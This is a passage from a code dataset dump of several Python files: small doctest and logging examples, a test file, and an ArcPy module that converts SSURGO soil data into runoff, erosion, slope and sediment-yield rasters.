[(200, 400), (100, 300), (200, 200), (600, 400), (700, 300), (600, 200)]\n\n \"\"\"\n leftx = centrex - halfwidth\n rightx = centrex + halfwidth\n pt0 = (leftx, centrey + radius)\n pt1 = (leftx - radius, centrey)\n pt2 = (leftx, centrey - radius)\n pt3 = (rightx, centrey + radius)\n pt4 = (rightx + radius, centrey)\n pt5 = (rightx, centrey - radius)\n return [pt0, pt1, pt2, pt3, pt4, pt5]\n\n\ndef _test():\n import doctest\n doctest.testmod(extraglobs={'k': Kite()})\n\n\nif __name__ == '__main__':\n # Can run with -v option if you want to confirm tests were run\n _test()\n","sub_path":"scripts/mainclasses.py","file_name":"mainclasses.py","file_ext":"py","file_size_in_byte":29264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"560778131","text":"import os\nimport logging\nfrom logging import handlers\n\n\n_log_file_cloud_dir = \"src/cloud/\"\n_log_file_error = \"log/Error.log\"\n_log_file_cloud = \"log/Cloud.log\"\n\n_level = logging.INFO\n_when = 'D'\n_backupCount = 5\n_fmt = '%(asctime)s - %(pathname)s[line:%(lineno)d] - %(levelname)s: %(message)s'\n\n\ndef _get_logger(filename: str):\n logger = logging.getLogger(filename)\n format_str = logging.Formatter(_fmt)\n logger.setLevel(_level)\n\n # Print to the console\n sh = logging.StreamHandler() \n sh.setFormatter(format_str)\n logger.addHandler(sh)\n\n # Print to the file\n th = handlers.TimedRotatingFileHandler(filename = filename, when = _when, backupCount = _backupCount, encoding = 'utf-8') \n th.setFormatter(format_str)\n logger.addHandler(th)\n\n return (logger, sh, th)\n\n\nclass CloudLogger:\n def __init__(self):\n self.logger, self.sh, self.th = _get_logger(_log_file_cloud)\n self.error_logger, self.error_sh, self.error_th = _get_logger(_log_file_error)\n self.error_logger.removeHandler(self.error_sh)\n","sub_path":"src/cloud/log/Logger.py","file_name":"Logger.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"180098526","text":"#!/usr/bin/env python3\n# October 2018\n\n\"\"\" Some functions exemplifying the use of control statements. \"\"\"\n\n__appname__ = '[test_control_flow.py]'\n__author__ = 'David Scott (david.scott18@imperial.ac.uk)'\n__license__ = \"License for this code/program\" \n__version__ = '0.0.1'\n\n## imports ##\nimport sys\nimport doctest # Import the doctest module\n\n## function ##\ndef even_or_odd(x=0):\n \"\"\"Find whether a number x is even or odd.\n \n >>> even_or_odd(10)\n '10 is Even!'\n \n >>> even_or_odd(5)\n '5 is Odd!'\n \n whenever a float is provided, then the closest integer is used: \n >>> even_or_odd(3.2)\n '3 is Odd!'\n \n in case of negative numbers, the positive is taken: \n >>> even_or_odd(-2)\n '-2 is Even!'\n \n \"\"\"\n #Define function to be tested\n if x % 2 == 0:\n return \"%d is Even!\" % x\n return \"%d is Odd!\" % x\n\n####### I SUPPRESSED THIS BLOCK: WHY? #######\n\ndef main(argv): \n \"\"\" Call even_or_odd function defined \"\"\"\n print(even_or_odd(22))\n print(even_or_odd(33))\n return 0\n\nif (__name__ == \"__main__\"):\n status = main(sys.argv)\n#############################################\n \ndoctest.testmod() # To run with embedded tests\n","sub_path":"Week2/Code/test_control_flow.py","file_name":"test_control_flow.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"440840072","text":"\"\"\"\n.. module:: inventory test\n:synopsis: tests Idea class\n:author: Corey Rayburn Yung\n:copyright: 2019\n:license: Apache-2.0\n\"\"\"\n\nfrom pathlib import Path\n\nfrom simplify.core.idea import Idea\nfrom simplify.core.inventory import Inventory\n\n\ndef test_inventory():\n idea = Idea(\n configuration = Path.cwd().joinpath('tests', 'idea_settings.ini'))\n inventory = Inventory(idea = idea)\n assert inventory.folders['root'] == Path.cwd().joinpath('..\\..')\n return\n\n\nif __name__ == '__main__':\n test_inventory()","sub_path":"tests/test_inventory.py","file_name":"test_inventory.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"579729805","text":"# ---------------------------------------------------------------------------\r\n# procSSURGO.py\r\n# Version: ArcPro / Python 3+\r\n# Creation Date: 2020-05-19\r\n# Last Edit: 2020-11-19\r\n# Creator: Kirsten R. Hazler\r\n#\r\n# Summary: Functions for processing SSURGO data and producing rasters representing soil conditions, as well as functions inspired by OpenNSPECT software to produce rasters representing interactions between soils, topography, and land cover.\r\n#\r\n# Adapted from toolbox tools and scripts used to produce the 2017 edition of the ConservationVision Watershed Model, and from information about the OpenNSPECT tool.\r\n# For background references and formulas, see: \r\n# - Virginia ConservationVision Watershed Model, 2017 Edition (NHTR 18-16; 2018)\r\n# - Technical Guide for OpenNSPECT, Version 1.1 (2012)\r\n# - Predicting soil erosion by water: a guide to conservation planning with the revised universal soil loss equation (RUSLE) (USDA Agriculture Handbook 703; 1997)\r\n\r\n# NOTE: Landcover used in these functions should be a hybrid NLCD/CCAP product. Where CCAP is coded 19 (unconsolidated shore), the NLCD data should be recoded from code 31 (barren land) to code 32.\r\n# ---------------------------------------------------------------------------\r\n\r\n# Import modules\r\nimport HelperPro\r\nfrom HelperPro import *\r\n\r\ndef SSURGOtoRaster(in_gdbList, in_Fld, in_Snap, out_Raster):\r\n '''From one or more gSSURGO geodatabases, creates a raster representing values from a specified field in the MUPOLYGON feature class. \r\n \r\n Parameters:\r\n in_gdbList: List of gSSURGO geodatabases containing added attributes\r\n in_Fld: field in MUPOLYGON feature class used to determine output raster values\r\n in_Snap: Input raster that determines output coordinate system, processing extent, cell size, and alignment\r\n out_Runoff: Output raster representing runoff score\r\n '''\r\n \r\n # Set overwrite to be true \r\n arcpy.env.overwriteOutput = True\r\n \r\n # Specify scratch location\r\n scratchGDB = arcpy.env.scratchGDB\r\n \r\n # Empty list to contain raster paths\r\n rasterList = []\r\n \r\n # Work through loop converting polygons to rasters\r\n for gdb in in_gdbList:\r\n try:\r\n inPoly = gdb + os.sep + \"MUPOLYGON\"\r\n bname = os.path.basename(gdb).replace(\".gdb\",\"\")\r\n print(\"Working on %s\" %bname)\r\n outRast = scratchGDB + os.sep + bname\r\n PolyToRaster(inPoly, in_Fld, in_Snap, outRast)\r\n rasterList.append(outRast)\r\n except:\r\n print(\"Failed to rasterize %s\" %bname)\r\n \r\n print(\"Finalizing output and saving...\")\r\n finRast = CellStatistics(rasterList, \"MAXIMUM\", \"DATA\")\r\n finRast.save(out_Raster)\r\n \r\n print(\"Mission complete.\")\r\n\r\ndef RunoffScore_vec(in_GDB):\r\n '''To the muaggatt table and the MUPOLYGON feature class, adds a field called \"runoffScore\", with scores from 0 (no runoff) to 100 (high runoff).\r\n Scores are based on drainage classes per Table 2, page 27 in NHTR 18-16.\r\n \r\n This function modifies the input data by adding new fields. 
It does not modify existing fields.\r\n Parameters:\r\n - in_GDB: input gSSURGO geodatabase\r\n '''\r\n\r\n # Specify some variables\r\n muaggatt = in_GDB + os.sep + \"muaggatt\"\r\n mupolygon = in_GDB + os.sep + \"MUPOLYGON\"\r\n bname = os.path.basename(in_GDB)\r\n print(\"Working on %s\" %bname) \r\n \r\n # Create a field in the muaggatt table to store the runoff score value, and calculate\r\n print(\"Adding runoffScore field...\")\r\n arcpy.AddField_management(muaggatt, \"runoffScore\", \"SHORT\")\r\n codeblock = '''def score(drainclass):\r\n # Create a dictionary relating drainage classes to scores\r\n s = dict()\r\n s[\"Very poorly drained\"] = 100\r\n s[\"Poorly drained\"] = 90\r\n s[\"Somewhat poorly drained\"] = 75\r\n s[\"Moderately well drained\"] = 50\r\n s[\"Well drained\"] = 25\r\n s[\"Somewhat excessively drained\"] = 10\r\n s[\"Excessively drained\"] = 0\r\n \r\n # Deal with nulls. Most nulls are either open water or developed. \r\n # Open water doesn't matter since it will be masked out in the end. \r\n # Developed areas tend to have high runoff, so assign score of 100.\r\n try: \r\n score = s[drainclass]\r\n except:\r\n score = 100 \r\n \r\n return score\r\n '''\r\n expression = \"score(!drclassdcd!)\" \r\n print(\"Calculating runoffScore field...\")\r\n arcpy.CalculateField_management (muaggatt, \"runoffScore\", expression, 'PYTHON', codeblock)\r\n\r\n # Process: Join Runoff Score to MUPOLYGON\r\n # First check if field exists (due to prior processing) and delete if so\r\n fldList = arcpy.ListFields(mupolygon) \r\n fldNames = [f.name for f in fldList]\r\n if \"runoffScore\" in fldNames:\r\n print(\"Deleting existing runoffScore field in MUPOLYGON...\")\r\n arcpy.DeleteField_management (mupolygon, \"runoffScore\")\r\n print(\"Joining runoffScore field to MUPOLYGON...\")\r\n arcpy.JoinField_management(mupolygon, \"MUKEY\", muaggatt, \"mukey\", \"runoffScore\")\r\n \r\n print(\"Mission complete for %s.\" %bname)\r\n\r\n return\r\n\r\ndef ErosionScore_vec(in_GDB):\r\n '''To the MUPOLYGON feature class, adds a field called \"KFACTWS_DCD\", containing the K-factor values extracted from gSSURGO. Also adds a field called \"erosionScore\", with scores from 0 (low erodibility) to 100 (high erodibility), derived from the K-factor value provided by gSSURGO. \r\n \r\n This function modifies the input geodatabase by adding new tables and fields. It does not modify existing fields.\r\n \r\n Parameters:\r\n - in_GDB: input gSSURGO geodatabase\r\n \r\n K-factor values range from 0.02 to 0.69*. Erosion scores are derived as described on page 6 in NHTR 18-16, except that the maximum K-factor value of 0.69, not 0.55, obtains the maximum erosion score.\r\n \r\n * per https://dec.vermont.gov/sites/dec/files/wsm/stormwater/docs/StormwaterConstructionDischargePermits/sw_9020_Erodibility_%20Guidance.pdf\r\n\r\n IMPORTANT: Prior to running this function, new data must be created within the input geodatabase, using a tool in the Soil Data Development Toolbox. Tools in this toolbox can only be run from within ArcMap (not ArcPro) and I haven't figured out a way to automate this with a script, so you need to do it manually.\r\n \r\n The Soil Data Development Toolbox must be added to ArcToolbox in ArcMap, and is available from https://www.nrcs.usda.gov/wps/portal/nrcs/detail/soils/home/?cid=nrcs142p2_053628#tools.\r\n \r\n TO CREATE THE DATA NEEDED FOR THIS FUNCTION:\r\n - Within ArcMap, add the MUPOLYGON feature class as a layer. 
\r\n - NOTE: If you will be working on data from multiple databases, it is recommended that you rename the layer in the map (e.g., MUPOLYGON_VA for the data from Virginia). Alternatively, remove the layer once you are done with it, before adding the next one.\r\n - From the Soil Data Development Toolbox, gSSURGO Mapping Toolset, open the \"Create Soil Map\" tool\r\n - In the tool, set the following parameters:\r\n - Map Unit Layer: MUPOLYGON [or renamed layer]\r\n - SDV Folder = \"Soil Erosion Factors\"\r\n - SDV Attribute = \"K Factor, Whole Soil\"\r\n - Aggregation Method = \"Dominant Condition\"\r\n - Top Depth (cm) = \"0\"\r\n - Bottom Depth (cm) = \"10\"\r\n - Run the tool. A new layer symbolized on the K-factor will appear.\r\n - Repeat as needed for MUPOLYGON data from different databases. \r\n - Close ArcMap prior to attempting to run this function.\r\n \r\n The run of the above tool modifies the geodatabase by creating new tables with the prefix \"SDV_\". It does not modify existing tables.\r\n \r\n Given the above parameters, it creates a table named SDV_KfactWS_DCD_0to10, in which the field named KFACTWS_DCD contains the K-factor. If this is not the case, the function will fail.\r\n '''\r\n\r\n # Set up some variables\r\n mupolygon = in_GDB + os.sep + \"MUPOLYGON\"\r\n kfactTab = in_GDB + os.sep + \"SDV_KfactWS_DCD_0to10\"\r\n kfactFld = \"KFACTWS_DCD\"\r\n kMin = 0.02\r\n kMax = 0.69\r\n bname = os.path.basename(in_GDB)\r\n print(\"Working on %s\" %bname) \r\n \r\n # For some reason, the K-factor field created by the SSURGO toolbox is a string. \r\n # Convert to double since this is needed for correct rasterization later.\r\n print(\"Converting string to double...\")\r\n arcpy.AddField_management(kfactTab, \"kFactor\", \"DOUBLE\")\r\n expression = \"float(!%s!)\" %kfactFld\r\n arcpy.CalculateField_management (kfactTab, \"kFactor\", expression, 'PYTHON')\r\n kfactFld = \"kFactor\"\r\n \r\n # Process: Join K-factor value to MUPOLYGON\r\n # First check if field exists (due to prior processing) and delete if so\r\n fldList = arcpy.ListFields(mupolygon) \r\n fldNames = [f.name for f in fldList]\r\n if kfactFld in fldNames:\r\n print(\"Deleting existing K-factor field in MUPOLYGON...\")\r\n arcpy.DeleteField_management (mupolygon, kfactFld)\r\n print(\"Joining K-factor field to MUPOLYGON...\")\r\n arcpy.JoinField_management(mupolygon, \"MUKEY\", kfactTab, \"MUKEY\", kfactFld)\r\n \r\n # Replace nulls in the K-factor field with the value 0.30, per the OpenNSPECT Technical Guide.\r\n print(\"Replacing nulls in K-factor field...\")\r\n codeblock = '''def replaceNulls(fld):\r\n if fld == None:\r\n val = 0.3\r\n else:\r\n val = fld\r\n return val\r\n '''\r\n expression = \"replaceNulls(!%s!)\" %kfactFld\r\n arcpy.CalculateField_management (mupolygon, kfactFld, expression, 'PYTHON', codeblock)\r\n \r\n # Create a field in MUPOLYGON to store the erosion score value, and calculate\r\n print(\"Adding erosionScore field...\")\r\n arcpy.AddField_management(mupolygon, \"erosionScore\", \"SHORT\")\r\n \r\n print(\"Calculating erosionScore field...\")\r\n codeblock = '''def score(kfact, minThresh, maxThresh):\r\n if float(kfact) < minThresh:\r\n score = 0\r\n elif float(kfact) > maxThresh:\r\n score = 100\r\n else:\r\n score = 100*(float(kfact) - minThresh)/(maxThresh - minThresh)\r\n return score\r\n '''\r\n expression = \"score(!%s!,%s, %s)\" %(kfactFld, kMin, kMax)\r\n arcpy.CalculateField_management (mupolygon, \"erosionScore\", expression, 'PYTHON', codeblock)\r\n \r\n print(\"Mission 
complete for %s.\" %bname)\r\n\r\n return\r\n\r\ndef HydroGrp_vec(in_GDB):\r\n '''To the MUPOLYGON feature class, adds a field called \"HYDROLGRP_DCD\", containing the Hydrologic Soil Groups extracted from gSSURGO. Values range from A to D (with some compound classes possible, e.g., A/D). Also adds a field called \"HydroGrpNum\", which contains a numeric, simplified version of the hydrologic groups in which there are no compound groups and no nulls.\r\n \r\n This function modifies the input geodatabase by adding new tables and fields. It does not modify existing fields.\r\n \r\n Parameters:\r\n - in_GDB: input gSSURGO geodatabase\r\n \r\n Per OpenNSPECT guidance, numeric values for the groups are assigned as follows:\r\n - A = 1\r\n - B = 2\r\n - C = 3\r\n - D = 4\r\n \r\n Compound values (e.g., A/D) are assigned the latter group. Null values are assumed to be group D. \r\n \r\n IMPORTANT: Prior to running this function, new data must be created within the input geodatabase, using a tool in the Soil Data Development Toolbox. Tools in this toolbox can only be run from within ArcMap (not ArcPro) and I haven't figured out a way to automate this with a script, so you need to do it manually.\r\n \r\n The Soil Data Development Toolbox must be added to ArcToolbox in ArcMap, and is available from https://www.nrcs.usda.gov/wps/portal/nrcs/detail/soils/home/?cid=nrcs142p2_053628#tools.\r\n \r\n TO CREATE THE DATA NEEDED FOR THIS FUNCTION:\r\n - Within ArcMap, add the MUPOLYGON feature class as a layer. \r\n - NOTE: If you will be working on data from multiple databases, it is recommended that you rename the layer in the map (e.g., MUPOLYGON_VA for the data from Virginia). Alternatively, remove the layer once you are done with it, before adding the next one.\r\n - From the Soil Data Development Toolbox, gSSURGO Mapping Toolset, open the \"Create Soil Map\" tool\r\n - In the tool, set the following parameters:\r\n - Map Unit Layer: MUPOLYGON [or renamed layer]\r\n - SDV Folder = \"Soil Qualities and Features\"\r\n - SDV Attribute = \"Hydrologic Soil Group\"\r\n - Aggregation Method = \"Dominant Condition\"\r\n - Run the tool. A new layer symbolized on the Hydrologic Soil Group will appear.\r\n - Repeat as needed for MUPOLYGON data from different databases. \r\n - Close ArcMap prior to attempting to run this function.\r\n \r\n The run of the above tool modifies the geodatabase by creating new tables with the prefix \"SDV_\". It does not modify existing tables.\r\n \r\n Given the above parameters, it creates a table named SDV_HydrolGrp_DCD, in which the field named HYDROLGRP_DCD contains the Hydrologic Soil Group code. 
If this is not the case, the function will fail.\r\n '''\r\n\r\n # Set up some variables\r\n mupolygon = in_GDB + os.sep + \"MUPOLYGON\"\r\n hydroTab = in_GDB + os.sep + \"SDV_HydrolGrp_DCD\"\r\n hydroFld = \"HYDROLGRP_DCD\"\r\n bname = os.path.basename(in_GDB)\r\n print(\"Working on %s\" %bname) \r\n \r\n # Process: Join Hydrologic Group value to MUPOLYGON\r\n # First check if field exists (due to prior processing) and delete if so\r\n fldList = arcpy.ListFields(mupolygon) \r\n fldNames = [f.name for f in fldList]\r\n if hydroFld in fldNames:\r\n print(\"Deleting existing hydrologic group field in MUPOLYGON...\")\r\n arcpy.DeleteField_management (mupolygon, hydroFld)\r\n print(\"Joining Hydrologic Group field to MUPOLYGON...\")\r\n arcpy.JoinField_management(mupolygon, \"MUKEY\", hydroTab, \"MUKEY\", hydroFld)\r\n \r\n # Create and calculate a field in MUPOLYGON to store numeric version of hydrologic group, and calculate\r\n print(\"Adding numeric field for hydrologic group...\")\r\n arcpy.AddField_management(mupolygon, \"HydroGrpNum\", \"SHORT\")\r\n \r\n print(\"Calculating HydroGrpNum field...\")\r\n codeblock = '''def grpNum(fld):\r\n d = dict()\r\n d[\"A\"] = 1\r\n d[\"B\"] = 2\r\n d[\"C\"] = 3\r\n d[\"D\"] = 4\r\n \r\n if fld == None:\r\n key = \"D\"\r\n elif len(fld) > 1:\r\n key = fld[-1]\r\n else:\r\n key = fld \r\n \r\n val = d[key]\r\n \r\n return val\r\n '''\r\n expression = \"grpNum(!%s!)\" %hydroFld\r\n arcpy.CalculateField_management (mupolygon, \"HydroGrpNum\", expression, 'PYTHON', codeblock)\r\n \r\n print(\"Mission complete for %s.\" %bname)\r\n\r\n return\r\n\r\ndef SlopeTrans(in_Raster, inputType, transType, out_Trans, out_Slope, zfactor = 1):\r\n '''From a raster representing slope, creates a new raster representing a transformed representation of slope, depending on the transformation type (transType) specified. \r\n \r\n The transformation types that may be specified are:\r\n - TRUNCLIN: A truncated linear function. Flat and nearly level slopes less than or equal to 1 degree (~2%) are scored 0, extreme slopes greater than or equal to 30 degrees (~58%) are scored 100, and values are scaled linearly in between the threshold values. This is a modification of the transformation used to derive the Slope Score in the 2017 edition of the ConservationVision Watershed Model.\r\n - TRUNCSIN: A truncated sine function. The sine of the angle is multiplied by 200 to get the score, but values above 100 are truncated, which happens at 30 degrees.\r\n - RUSLE: A stepwise sine function used to derive the slope steepness factor (S) in the RUSLE equation. (See equations 4-4 and 4-5 on page 107 of the RUSLE handbook.)\r\n\r\n Parameters:\r\n - in_Raster: input raster representing slope or elevation\r\n - inputType: indicates whether the input raster is slope in degrees (DEG or DEGREES), slope as percent grade (PERC or PERCENT), or elevation (ELEV or ELEVATION)\r\n - transType: the transformation function used to produce the output raster\r\n permitted values: TRUNCLIN, TRUNCSIN, RUSLE\r\n - out_Trans: output raster representing transformed slope\r\n - out_Slope: output raster representing slope as percent grade (ignored if input is a slope raster)\r\n - zfactor: Number of ground x,y units in one surface z-unit (ignored if input is a slope raster)\r\n '''\r\n \r\n # Make sure user entered valid parameters, and report what they are. 
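\r\n # Worked example for orientation (editor's note; values follow from the formulas below):\r\n # TRUNCSIN maps 30 degrees to min(100, int(0.5 + 200*sin(pi/6))) = 100, and the two RUSLE\r\n # branches nearly agree at the 9-percent inflection point: 10.8*sin(atan(0.09)) + 0.03 = 1.00\r\n # versus 16.8*sin(atan(0.09)) - 0.50 = 1.01.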
\r\n if inputType in (\"DEG\", \"DEGREES\"):\r\n slopeType = \"DEGREES\"\r\n print(\"Input is slope in degrees.\")\r\n elif inputType in (\"PERC\", \"PERCENT\"):\r\n slopeType = \"PERCENT\"\r\n print(\"Input is slope as percent grade.\")\r\n elif inputType in (\"ELEV\", \"ELEVATION\"):\r\n slopeType = \"PERCENT\"\r\n print(\"Input is elevation.\")\r\n else:\r\n print(\"Input type specification is invalid. Aborting.\")\r\n sys.exit()\r\n \r\n if transType == \"TRUNCLIN\":\r\n print(\"Applying the truncated linear transformation.\")\r\n elif transType == \"TRUNCSIN\":\r\n print(\"Applying the truncated sine transformation.\")\r\n elif transType == \"RUSLE\":\r\n print(\"Applying the RUSLE transformation to get the S-factor.\")\r\n else:\r\n print(\"Transformation specification is invalid. Aborting.\")\r\n sys.exit()\r\n \r\n # Set overwrite to be true \r\n arcpy.env.overwriteOutput = True\r\n \r\n # Set scratch output location\r\n scratchGDB = arcpy.env.scratchGDB\r\n \r\n # Identify the slope raster or create it if necessary\r\n if inputType in (\"ELEV\", \"ELEVATION\"):\r\n print(\"Calculating slope from elevation...\")\r\n in_Slope = Slope(in_Raster, \"PERCENT_RISE\", zfactor) \r\n in_Slope.save(out_Slope)\r\n else: \r\n in_Slope = Raster(in_Raster)\r\n \r\n if transType == \"TRUNCLIN\":\r\n # Set flat and nearly level slopes (LTE 1 degree) to 0. Set extreme slopes (GTE 30 degrees) to 100. Use linear function to scale between those values.\r\n minSlope = 1.0\r\n maxSlope = 30.0\r\n if slopeType == \"PERCENT\":\r\n print(\"Calculating score...\")\r\n minSlope = 100*math.tan(minSlope*math.pi/180)\r\n maxSlope = 100*math.tan(maxSlope*math.pi/180)\r\n outRaster = Con(in_Slope <= minSlope, 0, Con((in_Slope > maxSlope), 100, 100 * (in_Slope - minSlope) / (maxSlope - minSlope)))\r\n else: \r\n print(\"Calculating score...\")\r\n outRaster = Con(in_Slope <= minSlope, 0, Con((in_Slope > maxSlope), 100, 100 * (in_Slope - minSlope) / (maxSlope - minSlope)))\r\n \r\n elif transType == \"TRUNCSIN\":\r\n # Take the sine, multiply by 200, and integerize. Upper values are truncated at 100 (which happens at 30 degrees).\r\n if slopeType == \"PERCENT\":\r\n print(\"Converting percent grade to radians and calculating score...\")\r\n outRaster = Min(100, Int(0.5 + 200*Sin(ATan(in_Slope/100))))\r\n else: \r\n print(\"Converting degrees to radians and calculating score...\")\r\n outRaster = Min(100, Int(0.5 + 200*Sin(in_Slope * math.pi/180.0)))\r\n \r\n else:\r\n # Use RUSLE transformation equations\r\n inflect = 9.0\r\n if slopeType == \"PERCENT\":\r\n print(\"Converting percent grade to radians and calculating S-factor...\")\r\n outRaster = Con(in_Slope < inflect, (10.8*(Sin(ATan(in_Slope/100))) + 0.03), (16.8*(Sin(ATan(in_Slope/100))) - 0.50))\r\n else: \r\n inflect = math.atan(inflect/100)*180/math.pi\r\n print(\"Converting degrees to radians and calculating S-factor...\")\r\n outRaster = Con(in_Slope < inflect, (10.8*(Sin(in_Slope * math.pi/180.0)) + 0.03), (16.8*(Sin(in_Slope * math.pi/180.0)) - 0.50))\r\n \r\n print(\"Saving output...\")\r\n outRaster.save(out_Trans)\r\n \r\n print(\"Mission complete\")\r\n \r\n return\r\n\r\ndef SoilSensitivity(in_RunoffScore, in_ErosionScore, in_SlopeScore, out_SoilSens):\r\n '''From rasters representing scores for slope, runoff potential, and erosion potential, creates a raster representing soil sensitivity, ranging from 0 (low sensitivity) to 100 (high sensitivity; i.e. where land use practices will have the most impact, for better or worse). 
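For example, runoff, erosion, and slope scores of 100, 50, and 30 average to Int(0.5 + 180/3) = 60. 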
This is the Soil Sensitivity Score from the Watershed Model. Inputs must have been first generated by previous functions to produce the input rasters. \r\n \r\n This function assumes all inputs are in the same coordinate system and properly aligned with each other.\r\n\r\n Parameters:\r\n - in_RunoffScore: input raster representing runoff score\r\n - in_ErosionScore: input raster representing erosion score\r\n - in_SlopeScore: input raster representing slope score\r\n - out_SoilSens: output raster representing soil sensitivity\r\n '''\r\n \r\n # Set overwrite to be true \r\n arcpy.env.overwriteOutput = True\r\n \r\n # Calculate soil sensitivity as average of three inputs, integerized\r\n print(\"Calculating soil sensitivity score...\")\r\n runoff = Raster(in_RunoffScore)\r\n erosion = Raster(in_ErosionScore)\r\n slope = Raster(in_SlopeScore)\r\n sens = Int(0.5 + (runoff + erosion + slope)/float(3))\r\n \r\n print(\"Saving output...\")\r\n sens.save(out_SoilSens)\r\n \r\n print(\"Mission complete.\")\r\n \r\ndef soilLoss_RKS(in_Rfactor, in_Kfactor, in_Sfactor, out_RKS):\r\n '''Multiplies the rasters representing three of the factors in the Revised Universal Soil Loss Equation (RUSLE), to produce a relative measure of the propensity for soil loss. Does not include the cover management (C), slope length (L), or the supporting practices (P) factors. Inputs must have been first generated by previous functions to produce the input rasters. \r\n \r\n NOTE: The output can be multiplied by the year-specific C-factor (which depends on land cover) to obtain a relative measure of soil loss propensity. The output can be multiplied by a constant C-factor to obtain best-case and worst-case scenarios.\r\n \r\n This function assumes all inputs are in the same coordinate system and properly aligned with each other.\r\n\r\n Parameters:\r\n - in_Rfactor: input raster representing the rainfall/runoff erosivity factor\r\n - in_Kfactor: input raster representing the soil erodibility factor\r\n - in_Sfactor: input raster representing the slope steepness factor\r\n - out_RKS: output raster representing the relative propensity for soil loss (R*K*S)\r\n '''\r\n \r\n # Set overwrite to be true \r\n arcpy.env.overwriteOutput = True\r\n \r\n # Calculate propensity for soil loss by multiplying the factors\r\n print(\"Calculating propensity for soil loss...\")\r\n R = Raster(in_Rfactor)\r\n K = Raster(in_Kfactor)\r\n S = Raster(in_Sfactor)\r\n RKS = R*K*S\r\n \r\n print(\"Saving output...\")\r\n RKS.save(out_RKS)\r\n \r\n print(\"Mission complete.\")\r\n\r\ndef soilLoss_RKSC(in_RKS, in_Cfact, out_RKSC):\r\n '''Produces a raster representing relative soil loss, based on the RUSLE R-, K-, S-, and C-factors.\r\n \r\n Parameters:\r\n - in_RKS: input raster representing the product of the RUSLE factors RKS\r\n - in_Cfact: input raster or constant (float) representing the RUSLE C-factor\r\n - out_RKSC: output raster representing the product of the RUSLE factors RKSC\r\n '''\r\n \r\n # Set overwrite to be true \r\n arcpy.env.overwriteOutput = True\r\n \r\n # Set up some variables\r\n in_RKS = Raster(in_RKS)\r\n try:\r\n in_Cfact = Raster(in_Cfact)\r\n except:\r\n pass\r\n \r\n # Perform calculation\r\n print(\"Multiplying RKS by C-factor...\")\r\n RKSC = in_RKS*in_Cfact\r\n print(\"Saving...\")\r\n RKSC.save(out_RKSC)\r\n \r\n print(\"Mission accomplished.\")\r\n\r\ndef SedYld(in_Raster, in_CurvNum, nameTag, in_Slope, out_GDB, in_Cfact = \"NONE\", sdrType = \"STD\", cellArea = 0.0001):\r\n '''Produces a raster representing the annual sediment yield.\r\n \r\n NOTE: The \"standard\" calculation for Sediment Delivery Ratio SDR is from 
the OpenNSPECT tech manual. I also tracked down the original paper from 1977. The equation was developed for a specific area and it is highly questionable that it should be applied anywhere else. I'm also not sure I'm using percent slope correctly to obtain ZL, the relief-length ratio. Because of my doubts about the whole thing, I developed a much simpler equation for a proxy \"alternate\" SDR. I don't assume any particular units can be assigned to the final sediment yield; I view both RKSC (the product of the RUSLE soil loss factors) and the final sediment yield to be relative measures only. I also left out the L-factor in RUSLE soil loss equation b/c it is difficult to calculate and maybe (probably?) not worth it.\r\n \r\n This function assumes all inputs are in the same coordinate system and properly aligned with each other.\r\n\r\n Parameters:\r\n - in_Raster: input raster representing product of the RUSLE factors, RKSC or RKS\r\n - in_CurvNum: input raster or constant (integer) representing the SCS curve number\r\n - nameTag: tag to add to basenames (land cover year or a scenario-based tag)\r\n - in_Slope: input raster representing percent slope\r\n - out_GDB: geodatabase to store outputs\r\n - in_Cfact: input raster or constant (float) representing the RUSLE C-factor. Enter \"NONE\" if in_Raster is RKSC (i.e., C-factor already included)\r\n - sdrType: Type of SDR to calculate: STD (standard) or ALT (alternate)\r\n - cellArea: area of cells in Curve Number raster, in square kilometers; ignored if using alternate method for SDR calculation\r\n '''\r\n \r\n # Set overwrite to be true \r\n arcpy.env.overwriteOutput = True\r\n \r\n # Set up some variables\r\n out_RKSC = out_GDB + os.sep + \"RKSC_%s\" %nameTag\r\n if sdrType == \"STD\":\r\n out_SDR = out_GDB + os.sep + \"SDR_%s\" %nameTag\r\n out_SedYld = out_GDB + os.sep + \"SedYld_%s\" %nameTag\r\n else:\r\n out_SDR = out_GDB + os.sep + \"altSDR_%s\" %nameTag\r\n out_SedYld = out_GDB + os.sep + \"altSedYld_%s\" %nameTag\r\n\r\n try:\r\n in_CurvNum = Raster(in_CurvNum)\r\n except:\r\n pass\r\n \r\n in_Slope = Raster(in_Slope)\r\n in_Raster = Raster(in_Raster)\r\n \r\n # Perform calculations\r\n if in_Cfact == \"NONE\":\r\n print(\"Input raster is RKSC...\")\r\n RKSC = in_Raster\r\n else:\r\n print(\"Input raster is RKS; multiplying by C-factor...\")\r\n try:\r\n in_Cfact = Raster(in_Cfact)\r\n except:\r\n pass\r\n RKSC = in_Raster*in_Cfact\r\n print(\"Saving...\")\r\n RKSC.save(out_RKSC)\r\n \r\n if sdrType == \"STD\":\r\n print(\"Calculating standard sediment delivery ratio...\")\r\n print(\"Calculating constant Alpha...\")\r\n Alpha = 1.366*10**(-11)\r\n \r\n print(\"Calculating drainage area factor...\")\r\n D = cellArea**(-0.0998)\r\n \r\n print(\"Calculating slope factor...\")\r\n Z = (in_Slope/100000.0)**0.3629 \r\n \r\n print(\"Calculating curve number factor...\")\r\n N = in_CurvNum**5.444 # This may be a raster or a constant depending on input type\r\n \r\n print(\"Calculating sediment delivery ratio...\")\r\n SDR = Alpha*D*Z*N\r\n \r\n else:\r\n print(\"Calculating alternate sediment delivery ratio...\")\r\n # Adjust slope values prior to multiplying\r\n adjSlope = Con(in_Slope > 100, 1.0, in_Slope/100.0)\r\n SDR = adjSlope*in_CurvNum/100.0\r\n \r\n print(\"Saving...\")\r\n SDR.save(out_SDR)\r\n \r\n print(\"Calculating sediment yield...\")\r\n sedYld = RKSC*SDR\r\n print(\"Saving...\")\r\n sedYld.save(out_SedYld)\r\n \r\n print(\"Mission accomplished.\") \r\n\r\ndef coeffNSPECT(in_LC, coeffType, out_Coeff):\r\n '''From an 
